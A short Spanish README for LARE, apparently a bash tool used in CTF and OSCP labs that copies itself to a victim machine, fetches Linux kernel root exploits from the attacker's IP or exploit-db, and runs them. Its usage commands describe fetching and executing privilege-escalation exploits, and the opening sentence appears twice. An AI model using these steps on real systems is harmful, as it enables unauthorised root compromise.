
[L]ocal [A]uto [R]oot [E]xploiter es un script simple de bash que te ayuda a desplegar exploits de root local desde tu máquina atacante cuando tu máquina víctima no tiene conectividad a internet.
[L]ocal [A]uto [R]oot [E]xploiter es un script bash simple que te ayuda a desplegar exploits de root locales desde tu máquina atacante cuando tu máquina víctima no tiene conectividad a internet.
El script es útil en un escenario donde tu máquina víctima no tiene conexión a internet (por ejemplo) mientras haces pivot hacia redes internas o juegas CTFs que usan VPN para conectarse a sus laboratorios cerrados (por ejemplo) hackthebox.gr o incluso en laboratorios OSCP. El script usa exploits de root locales para el kernel de Linux 2.6-4.8
Este script está inspirado en Nilotpal Biswas's Auto Root Exploit Tool
bash LARE.sh -a o ./LARE.sh -a
Una vez hecho esto, debes copiar el script a la máquina víctima por cualquier medio (wget, ftp, curl, etc.) y ejecutar el Exploiter localmente con el siguiente comando:
bash LARE.sh -l [IP-Atacante] o ./LARE.sh -l [IP-Atacante]
En este escenario, el script se ejecuta en la máquina víctima y obtendrá los exploits del repositorio de GitHub de exploit-db y los usará directamente para la explotación.
Esta es la funcionalidad original de Auto Root Exploit Tool con algunos ajustes finos.
Ejecuta el Exploiter con el siguiente comando:

bash LARE.sh -l o ./LARE.sh -l

El script ejecuta múltiples exploits del kernel en la máquina, lo que puede resultar en inestabilidad del sistema; se recomienda encarecidamente usarlo como último recurso y en un entorno que no sea de producción.